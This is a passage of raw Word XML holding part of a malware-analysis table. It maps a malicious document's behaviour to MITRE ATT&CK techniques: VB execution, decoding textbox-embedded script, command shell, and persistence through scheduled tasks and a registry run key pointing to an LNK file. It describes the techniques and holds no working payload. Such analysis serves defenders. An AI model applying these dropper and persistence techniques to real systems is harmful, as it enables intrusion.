                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidR="00067DF9" w:rsidRPr="00067DF9">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>TextFrame.TextRange.Text</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidR="00067DF9" w:rsidRPr="00067DF9">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>:close</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="00067DF9" w:rsidRPr="00067DF9">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>")</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006D3412" w:rsidRPr="00B857D7" w14:paraId="1CD93140" w14:textId="77777777" w:rsidTr="00794624">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="58C7BD68" w14:textId="6F96D0B8" w:rsidR="00EC403C" w:rsidRDefault="00A3361C" w:rsidP="00EC403C">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1260" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="01BA32A0" w14:textId="5094FAD2" w:rsidR="00EC403C" w:rsidRPr="00B857D7" w:rsidRDefault="00EC403C" w:rsidP="00EC403C">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5F34D08E" w14:textId="792B01D9" w:rsidR="00EC403C" w:rsidRPr="0067433A" w:rsidRDefault="00EC403C" w:rsidP="00EC403C">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="0067433A">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>T1059.005 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="0067433A">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> &lt;Command and Scripting Interpreter&gt;:Visual Basic</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="635" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0831CCC8" w14:textId="2F8B7254" w:rsidR="00EC403C" w:rsidRDefault="006D1649" w:rsidP="00EC403C">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="591" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="762B8A12" w14:textId="77777777" w:rsidR="00EC403C" w:rsidRPr="00B857D7" w:rsidRDefault="00EC403C" w:rsidP="00EC403C">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="555" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0BDC6BD4" w14:textId="365D3F1C" w:rsidR="00EC403C" w:rsidRPr="00B857D7" w:rsidRDefault="00EC403C" w:rsidP="00EC403C">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1010" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7989BC11" w14:textId="4F30B222" w:rsidR="00EC403C" w:rsidRPr="00B857D7" w:rsidRDefault="00167D27" w:rsidP="00EC403C">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>NP-EXE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3632" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3400C6D9" w14:textId="38DAB093" w:rsidR="00EC403C" w:rsidRPr="00B857D7" w:rsidRDefault="00167D27" w:rsidP="00EC403C">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>[1]</w:t>
            </w:r>
            <w:r w:rsidR="00242840">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>See above VB in call.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C91DAD" w:rsidRPr="00B857D7" w14:paraId="540F99E3" w14:textId="77777777" w:rsidTr="00794624">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="143138A5" w14:textId="22E51D20" w:rsidR="00242840" w:rsidRDefault="00A3361C" w:rsidP="004F28B4">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1260" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3F56CE69" w14:textId="655F2BDD" w:rsidR="00242840" w:rsidRPr="00B857D7" w:rsidRDefault="00242840" w:rsidP="004F28B4">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333" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="00395C07" w14:textId="10C9FE35" w:rsidR="00242840" w:rsidRPr="0067433A" w:rsidRDefault="00242840" w:rsidP="004F28B4">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00242840">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>T</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00242840">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>1140</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00242840">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>Deobfuscate</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00242840">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>/Decode Files or Information</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="635" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="338C2FC4" w14:textId="0DF539E0" w:rsidR="00242840" w:rsidRDefault="006D1649" w:rsidP="004F28B4">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="591" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="24114707" w14:textId="77777777" w:rsidR="00242840" w:rsidRPr="00B857D7" w:rsidRDefault="00242840" w:rsidP="004F28B4">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="555" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="45DE8AB8" w14:textId="686299A9" w:rsidR="00242840" w:rsidRPr="00B857D7" w:rsidRDefault="00242840" w:rsidP="004F28B4">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1010" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="057C9102" w14:textId="018E4991" w:rsidR="00242840" w:rsidRPr="00B857D7" w:rsidRDefault="00242840" w:rsidP="004F28B4">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>IF-DEV/NP-EXE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3632" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1AF30032" w14:textId="77777777" w:rsidR="00242840" w:rsidRDefault="00242840" w:rsidP="004F28B4">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve">[1] </w:t>
            </w:r>
            <w:r w:rsidRPr="00242840">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>The script in the argument combines all the textbox contents in the document and executes them, as seen in Figure 2.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="16D3BD3D" w14:textId="61BB45F5" w:rsidR="00242840" w:rsidRPr="00B857D7" w:rsidRDefault="00242840" w:rsidP="004F28B4">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006D3412" w:rsidRPr="00B857D7" w14:paraId="580351BC" w14:textId="77777777" w:rsidTr="00794624">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5343237D" w14:textId="3D584827" w:rsidR="004F28B4" w:rsidRDefault="00A3361C" w:rsidP="004F28B4">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1260" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="51B557F0" w14:textId="7E671E21" w:rsidR="004F28B4" w:rsidRPr="00B857D7" w:rsidRDefault="004F28B4" w:rsidP="004F28B4">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34FB70BF" w14:textId="3E5F61EC" w:rsidR="004F28B4" w:rsidRPr="00B857D7" w:rsidRDefault="004F28B4" w:rsidP="004F28B4">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="0067433A">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>T1059.003 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="0067433A">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> &lt;Command and Scripting Interpreter&gt;:Windows Command Shell</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="635" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2D213212" w14:textId="600C395E" w:rsidR="004F28B4" w:rsidRDefault="006D1649" w:rsidP="004F28B4">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="591" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="28E09BB8" w14:textId="77777777" w:rsidR="004F28B4" w:rsidRPr="00B857D7" w:rsidRDefault="004F28B4" w:rsidP="004F28B4">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="555" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1800C990" w14:textId="298CC88B" w:rsidR="004F28B4" w:rsidRPr="00B857D7" w:rsidRDefault="00242840" w:rsidP="004F28B4">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1010" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6D8A987B" w14:textId="6FAD61EE" w:rsidR="004F28B4" w:rsidRPr="00B857D7" w:rsidRDefault="00242840" w:rsidP="004F28B4">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>NP-EXE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3632" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="79088C82" w14:textId="6877BADE" w:rsidR="004F28B4" w:rsidRPr="00B857D7" w:rsidRDefault="00242840" w:rsidP="004F28B4">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve">[1] </w:t>
            </w:r>
            <w:r w:rsidRPr="00242840">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>The combined script from Word textbox drops the following components:</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006D3412" w:rsidRPr="00B857D7" w14:paraId="53BCD0F6" w14:textId="77777777" w:rsidTr="00794624">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5F7A635C" w14:textId="3A94B645" w:rsidR="004F28B4" w:rsidRDefault="006D3412" w:rsidP="004F28B4">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1260" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7542B682" w14:textId="57893C24" w:rsidR="004F28B4" w:rsidRPr="0067433A" w:rsidRDefault="004F28B4" w:rsidP="004F28B4">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2333" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1B607D42" w14:textId="1AB89ED4" w:rsidR="004F28B4" w:rsidRPr="008B3AF0" w:rsidRDefault="004F28B4" w:rsidP="004F28B4">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00A03F97">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>T1547.001 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00A03F97">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> &lt;Boot or Logon </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00A03F97">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>Autostart</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00A03F97">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> Execution&gt;:Registry Run Keys / Startup Folder</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="635" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5FB21355" w14:textId="74282B1E" w:rsidR="004F28B4" w:rsidRDefault="006D3412" w:rsidP="004F28B4">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="591" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="089BE201" w14:textId="77777777" w:rsidR="004F28B4" w:rsidRPr="00B857D7" w:rsidRDefault="004F28B4" w:rsidP="004F28B4">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="555" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="046B1E89" w14:textId="324AE6B2" w:rsidR="004F28B4" w:rsidRPr="00B857D7" w:rsidRDefault="004F28B4" w:rsidP="004F28B4">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1010" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4D9C9339" w14:textId="134A8E40" w:rsidR="004F28B4" w:rsidRPr="00B857D7" w:rsidRDefault="006D3412" w:rsidP="004F28B4">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>IF-PER</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3632" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0AC8C867" w14:textId="5585A66B" w:rsidR="004F28B4" w:rsidRPr="00B857D7" w:rsidRDefault="007807AE" w:rsidP="004F28B4">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve">[1] </w:t>
            </w:r>
            <w:r w:rsidRPr="007807AE">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>Figure 3 shows that for persistence, the document creates two scheduled tasks and creates one auto-start registry entry pointing to the LNK file.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006D3412" w:rsidRPr="00B857D7" w14:paraId="7EDF6912" w14:textId="77777777" w:rsidTr="00794624">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5A7F341C" w14:textId="5F9D678A" w:rsidR="004F28B4" w:rsidRDefault="00113135" w:rsidP="004F28B4">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1260" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5CFF0BCF" w14:textId="23B5D72C" w:rsidR="004F28B4" w:rsidRPr="0067433A" w:rsidRDefault="004F28B4" w:rsidP="004F28B4">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 xml:space="preserve">0003  </w:t>
            </w:r>
            <w:r w:rsidR="00183E12">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>:</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidR="00183E12">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>Persistence</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2333" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3F74E4C8" w14:textId="1D9B5140" w:rsidR="004F28B4" w:rsidRPr="008B3AF0" w:rsidRDefault="004F28B4" w:rsidP="004F28B4">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00A03F97">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>T1053.005 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00A03F97">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
